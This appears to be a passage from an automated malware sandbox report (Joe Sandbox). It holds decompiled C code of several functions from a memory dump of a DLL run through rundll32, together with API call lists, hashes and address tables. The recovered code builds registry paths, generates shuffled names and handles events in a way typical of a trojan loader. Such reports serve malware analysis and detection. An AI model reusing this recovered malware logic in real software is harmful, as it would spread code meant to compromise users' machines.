					__imp__( &_v284,  *0x4dea3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04DE4208( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E04DE3DCA(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E04DE4C73(_a8);
						goto L29;
					}
					_t64 =  *0x4dea318; // 0x54a9da0
					_t16 = _t64 + 0xc; // 0x54a9ec2
					_t65 = E04DE4208(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04de90, executed
						_t67 = E04DE4C88(_t97,  *_t33, _t91, _a8,  *0x4dea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x4dea348; // 0x6bd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4deba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4deb8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04DE26E7(_t69,  *0x4dea3d4,  *0x4dea3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4dea348; // 0x6bd5a8
									_t44 = _t71 + 0x4deb846; // 0x74666f53
									_t73 = E04DE4208(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04de90
										E04DE3B76( *_t47, _t91, _a8,  *0x4dea3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d04de90
										E04DE3B76( *_t49, _t91, _t99,  *0x4dea3d0, _a16);
										E04DE4C73(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04de90, executed
									E04DE3B76( *_t40, _t91, _a8,  *0x4dea3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d04de90
									E04DE3B76( *_t43, _t91, _a8,  *0x4dea3d0, _a16);
								}
								if( *_t101 != 0) {
									E04DE4C73(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04de90, executed
					_t81 = E04DE4E0B( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04de90
							E04DE4C88(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04DE4C73(_t100);
						_t98 = _a16;
					}
					E04DE4C73(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04DE799E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4dea3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                      0x04de6e20
                                      0x04de6e29
                                      0x04de6e30
                                      0x04de6e35
                                      0x04de6ea2
                                      0x04de6ea8
                                      0x04de6ead
                                      0x04de6eb4
                                      0x04de6eb9
                                      0x04de6ebe
                                      0x04de7029
                                      0x04de7030
                                      0x04de7030
                                      0x04de7035
                                      0x04de7037
                                      0x04de7037
                                      0x04de7040
                                      0x04de7040
                                      0x04de6ec4
                                      0x04de6ec9
                                      0x04de6ed0
                                      0x04de701f
                                      0x04de7022
                                      0x00000000
                                      0x04de7022
                                      0x04de6ed6
                                      0x04de6edb
                                      0x04de6ede
                                      0x04de6ee3
                                      0x04de6ee8
                                      0x04de6f31
                                      0x04de6f31
                                      0x04de6f44
                                      0x04de6f47
                                      0x04de6f4e
                                      0x04de6f54
                                      0x04de6f5b
                                      0x04de6f65
                                      0x04de6f65
                                      0x04de6f5d
                                      0x04de6f5d
                                      0x04de6f5d
                                      0x04de6f5d
                                      0x04de6f87
                                      0x04de6f8f
                                      0x04de6fbd
                                      0x04de6fc2
                                      0x04de6fc9
                                      0x04de6fce
                                      0x04de6fd2
                                      0x04de7004
                                      0x04de6fd4
                                      0x04de6fe1
                                      0x04de6fe4
                                      0x04de6ff4
                                      0x04de6ff7
                                      0x04de6ffd
                                      0x04de6ffd
                                      0x04de6f91
                                      0x04de6f9e
                                      0x04de6fa1
                                      0x04de6fb3
                                      0x04de6fb6
                                      0x04de6fb6
                                      0x04de700e
                                      0x04de701a
                                      0x04de7010
                                      0x04de7013
                                      0x04de7013
                                      0x04de700e
                                      0x04de6f87
                                      0x00000000
                                      0x04de6f4e
                                      0x04de6ef7
                                      0x04de6efa
                                      0x04de6f01
                                      0x04de6f07
                                      0x04de6f0a
                                      0x04de6f0c
                                      0x04de6f18
                                      0x04de6f1b
                                      0x04de6f1b
                                      0x04de6f21
                                      0x04de6f26
                                      0x04de6f26
                                      0x04de6f2c
                                      0x00000000
                                      0x04de6f2c
                                      0x04de6e3a
                                      0x00000000
                                      0x04de6e61
                                      0x04de6e61
                                      0x04de6e6d
                                      0x04de6e80
                                      0x04de6e86
                                      0x04de6e8e
                                      0x00000000
                                      0x04de6e8e

                                      APIs
                                      • StrChrA.SHLWAPI(04DE2A82,0000005F,00000000,00000000,00000104), ref: 04DE6E53
                                      • lstrcpy.KERNEL32(?,?), ref: 04DE6E80
                                        • Part of subcall function 04DE4208: lstrlen.KERNEL32(?,00000000,054A9DA0,00000000,04DE2263,054A9FC3,69B25F44,?,?,?,?,69B25F44,00000005,04DEA00C,4D283A53,?), ref: 04DE420F
                                        • Part of subcall function 04DE4208: mbstowcs.NTDLL ref: 04DE4238
                                        • Part of subcall function 04DE4208: memset.NTDLL ref: 04DE424A
                                        • Part of subcall function 04DE3B76: lstrlenW.KERNEL32(?,?,?,04DE6FE9,3D04DE90,80000002,04DE2A82,04DE744C,74666F53,4D4C4B48,04DE744C,?,3D04DE90,80000002,04DE2A82,?), ref: 04DE3B9B
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • lstrcpy.KERNEL32(?,00000000), ref: 04DE6EA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                      • String ID: ($\
                                      • API String ID: 3924217599-1512714803
                                      • Opcode ID: 26b5cc2f8de1ce676dbe4677d3e263839dcdbf06cc6d51f154679f2d32774029
                                      • Instruction ID: 75d98509810c4922c6055cd2dc75a97b71fa16d020ef29da5156ae351317872f
                                      • Opcode Fuzzy Hash: 26b5cc2f8de1ce676dbe4677d3e263839dcdbf06cc6d51f154679f2d32774029
                                      • Instruction Fuzzy Hash: D1512A7160020AEFDF22BFA2DC44EBA7BB9FF04354F008555FA1596260D736F925AB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5803 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 66%
                                      			E04DE5803(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr _t37;
				intOrPtr* _t43;
				void* _t44;
				void* _t47;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t47 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x4dea348; // 0x6bd5a8
				_t2 = _t22 + 0x4deb682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x4dea3e0; // 0x54a9ba8
				_push(0x800);
				_push(0);
				_push( *0x4dea2d8);
				if( *0x4dea2ec >= 5) {
					_t26 = RtlAllocateHeap(); // executed
					if(_t26 == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x4dea2ec =  *0x4dea2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E04DE2087(_t52, _t50); // executed
						_t30 = E04DE6D7F(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x4dea2ec < 5) {
								 *0x4dea2ec =  *0x4dea2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E04DE3F62();
						HeapFree( *0x4dea2d8, 0, _t50);
						goto L10;
					}
					_t37 = E04DE636D(_a4, _t47, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t37 = E04DE59E2(_a4, _t44, _t47, _t51,  &_v48,  &_v8,  &_a16, _t38);
				goto L5;
			}
















                                      0x04de5803
                                      0x04de5803
                                      0x04de580a
                                      0x04de5811
                                      0x04de5815
                                      0x04de581a
                                      0x04de5825
                                      0x04de582b
                                      0x04de583b
                                      0x04de5840
                                      0x04de5842
                                      0x04de5848
                                      0x04de586c
                                      0x04de5874
                                      0x04de5891
                                      0x04de5891
                                      0x04de5898
                                      0x04de589c
                                      0x04de58d6
                                      0x04de58d6
                                      0x04de58dc
                                      0x04de58e3
                                      0x04de58e3
                                      0x04de589e
                                      0x04de58a1
                                      0x04de58a3
                                      0x04de58b0
                                      0x04de58b2
                                      0x04de58b9
                                      0x04de58f0
                                      0x04de58f5
                                      0x04de58f7
                                      0x04de58f9
                                      0x04de58f9
                                      0x00000000
                                      0x04de58f7
                                      0x04de58bb
                                      0x04de58c2
                                      0x04de58d0
                                      0x00000000
                                      0x04de58d0
                                      0x04de5887
                                      0x04de588c
                                      0x04de588c
                                      0x00000000
                                      0x04de588c
                                      0x04de5852
                                      0x00000000
                                      0x00000000
                                      0x04de5865
                                      0x00000000

                                      APIs
                                      • wsprintfA.USER32 ref: 04DE5825
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE584A
                                        • Part of subcall function 04DE59E2: GetTickCount.KERNEL32 ref: 04DE59F6
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5A46
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5A63
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5A83
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5AAF
                                        • Part of subcall function 04DE59E2: HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AC1
                                        • Part of subcall function 04DE59E2: wsprintfA.USER32 ref: 04DE5AE2
                                        • Part of subcall function 04DE59E2: HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AF2
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE586C
                                      • HeapFree.KERNEL32(00000000,?,?), ref: 04DE58D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: wsprintf$Heap$Free$Allocate$CountTick
                                      • String ID: FNwPq
                                      • API String ID: 1428766365-3591455833
                                      • Opcode ID: 87af9e00c7d958a52e1bd58867e72e453506b962b71b32fd65aa73461f182884
                                      • Instruction ID: e2928ee5dca2ea297d48a0dd62acef2841be8cda805f97b7e38d81bc5ebab0c7
                                      • Opcode Fuzzy Hash: 87af9e00c7d958a52e1bd58867e72e453506b962b71b32fd65aa73461f182884
                                      • Instruction Fuzzy Hash: F5312A71601209FBCB01EF96E8A4AEE3BBCFB08354F108452F905AB341D774E955DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE70AE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 22%
                                      			E04DE70AE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04DE4DF6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04DE4C73(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04DE4DF6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4dea318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                      0x04de70b5
                                      0x04de70bc
                                      0x04de70c1
                                      0x04de70c4
                                      0x04de70cb
                                      0x04de70ce
                                      0x04de70d1
                                      0x04de70d6
                                      0x04de70db
                                      0x04de722f
                                      0x04de7231
                                      0x04de7233
                                      0x04de7238
                                      0x04de7238
                                      0x04de70e1
                                      0x04de70e4
                                      0x04de70e7
                                      0x04de70e9
                                      0x04de70e9
                                      0x04de70ed
                                      0x00000000
                                      0x00000000
                                      0x04de70f1
                                      0x04de711d
                                      0x04de7122
                                      0x04de7124
                                      0x04de7124
                                      0x04de7127
                                      0x04de712a
                                      0x04de712a
                                      0x04de712c
                                      0x00000000
                                      0x04de70f7
                                      0x04de70f9
                                      0x04de7118
                                      0x04de7118
                                      0x04de712f
                                      0x04de712f
                                      0x04de7130
                                      0x04de7130
                                      0x04de7133
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de7133
                                      0x04de70fd
                                      0x04de7144
                                      0x04de7148
                                      0x04de7222
                                      0x04de7224
                                      0x04de7224
                                      0x04de7225
                                      0x04de7228
                                      0x00000000
                                      0x04de7228
                                      0x04de7151
                                      0x04de7162
                                      0x04de7166
                                      0x04de721e
                                      0x00000000
                                      0x04de721e
                                      0x04de716c
                                      0x04de716f
                                      0x04de7173
                                      0x04de7177
                                      0x04de717c
                                      0x04de7214
                                      0x04de7214
                                      0x00000000
                                      0x04de721a
                                      0x04de7187
                                      0x04de7190
                                      0x04de71a4
                                      0x04de71ab
                                      0x04de71c0
                                      0x04de71c6
                                      0x04de71ce
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de71d0
                                      0x04de71d0
                                      0x04de71d0
                                      0x04de71d7
                                      0x04de71df
                                      0x00000000
                                      0x00000000
                                      0x04de71e1
                                      0x04de71ea
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de71ec
                                      0x04de71ee
                                      0x04de71f1
                                      0x04de71f1
                                      0x04de71f4
                                      0x04de71f8
                                      0x04de71fb
                                      0x04de7201
                                      0x04de7204
                                      0x04de720b
                                      0x00000000
                                      0x04de7187
                                      0x04de7102
                                      0x04de710a
                                      0x04de7110
                                      0x04de7112
                                      0x04de7112
                                      0x04de7115
                                      0x04de7117
                                      0x00000000
                                      0x04de7117
                                      0x04de70f1
                                      0x04de7137
                                      0x04de713c
                                      0x04de713e
                                      0x04de713e
                                      0x04de7141
                                      0x04de7141
                                      0x00000000

                                      APIs
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04DE71AB
                                      • lstrcat.KERNEL32(69B25F45,00000020), ref: 04DE71C0
                                      • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04DE71D7
                                      • lstrlen.KERNEL32(69B25F45), ref: 04DE71FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                      • String ID:
                                      • API String ID: 3214092121-3916222277
                                      • Opcode ID: 60934489f68116915ecf5f614e0b83862c1b7823897c0327daf23dcf58db7671
                                      • Instruction ID: 8e6c85196b6c1d63f27df5fde458f09048849b397ba6b3e7aed840b57a2fc645
                                      • Opcode Fuzzy Hash: 60934489f68116915ecf5f614e0b83862c1b7823897c0327daf23dcf58db7671
                                      • Instruction Fuzzy Hash: 0D519071A00208EBDF61EFAAC8846BDBBF6FF45314F15909AE8559F201D731EA41DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE1666 Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE1666(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x4dea310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4dea348; // 0x6bd5a8
				_t3 = _t8 + 0x4deb87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E04DE4B16(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4dea34c, 1, 0, _t30);
					E04DE4C73(_t30);
				}
				_t12 =  *0x4dea2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E04DE2384(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E04DE6DB6(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E04DE3E6C(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                                      0x04de1667
                                      0x04de166e
                                      0x04de1678
                                      0x04de167c
                                      0x04de1682
                                      0x04de1691
                                      0x04de1698
                                      0x04de169c
                                      0x04de16ae
                                      0x04de16b0
                                      0x04de16b0
                                      0x04de16b5
                                      0x04de16bc
                                      0x04de1713
                                      0x04de1713
                                      0x04de1719
                                      0x04de171b
                                      0x04de171b
                                      0x04de1720
                                      0x04de1725
                                      0x04de1729
                                      0x04de173b
                                      0x04de173b
                                      0x04de173f
                                      0x04de1745
                                      0x04de1745
                                      0x00000000
                                      0x04de16cc
                                      0x04de16cc
                                      0x04de16d3
                                      0x00000000
                                      0x00000000
                                      0x04de16da
                                      0x04de16e2
                                      0x04de16e6
                                      0x04de16ea
                                      0x04de16ea
                                      0x04de16f2
                                      0x04de16f7
                                      0x04de16fb
                                      0x04de16ff
                                      0x04de1754
                                      0x04de175a
                                      0x04de175a
                                      0x04de170d
                                      0x04de1711
                                      0x04de1748
                                      0x04de174a
                                      0x04de174d
                                      0x04de174d
                                      0x00000000
                                      0x04de174a
                                      0x04de1711
                                      0x00000000
                                      0x04de16fb

                                      APIs
                                        • Part of subcall function 04DE4B16: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,054A9DA0,00000000,?,?,69B25F44,00000005,04DEA00C,4D283A53,?,?), ref: 04DE4B4C
                                        • Part of subcall function 04DE4B16: lstrcpy.KERNEL32(00000000,00000000), ref: 04DE4B70
                                        • Part of subcall function 04DE4B16: lstrcat.KERNEL32(00000000,00000000), ref: 04DE4B78
                                      • CreateEventA.KERNEL32(04DEA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE16A7
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • StrChrW.SHLWAPI(04DE2AA1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE16DA
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,04DE2AA1,00000000,00000000,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE1707
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE1735
                                      • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04DE2AA1,?,?,?), ref: 04DE174D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                      • String ID:
                                      • API String ID: 73268831-0
                                      • Opcode ID: 95bee7b66d0dc3a170340f300cdcf61444eaff02f33dc7d7e430efc43b1d2fc6
                                      • Instruction ID: 9c83b06c815051cf69b319ab8e42b8f1b10c2c505bc39b4dace52f1866cb2d40
                                      • Opcode Fuzzy Hash: 95bee7b66d0dc3a170340f300cdcf61444eaff02f33dc7d7e430efc43b1d2fc6
                                      • Instruction Fuzzy Hash: B521C132700612DBD731BAAB9C84A7E73A8FB88B24B450629FD01AB240DB74EC018760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F1236F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.568538445.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_2f10000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: X
                                      • API String ID: 544645111-3081909835
                                      • Opcode ID: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                      • Instruction ID: f0f41d5e22c98a2ef995b235f085ae1080806971f0395e7bd76c77147cc25c1e
                                      • Opcode Fuzzy Hash: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                      • Instruction Fuzzy Hash: D4B1BEB5E002288FDB54CF98C990B9DBBF1FF48304F1581AAD908AB356D775A985CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE250D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73memorystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E04DE250D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x4dea2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E04DE799E(_t57 - _a4, _a4, _t48);
							_t38 = E04DE799E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E04DE799E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                      0x04de2515
                                      0x04de2518
                                      0x04de251a
                                      0x04de2523
                                      0x04de2535
                                      0x04de2535
                                      0x04de2539
                                      0x04de253b
                                      0x04de253e
                                      0x04de2541
                                      0x04de254a
                                      0x04de2554
                                      0x04de2558
                                      0x04de255d
                                      0x04de256d
                                      0x04de2573
                                      0x04de2577
                                      0x04de25c6
                                      0x04de2579
                                      0x04de2579
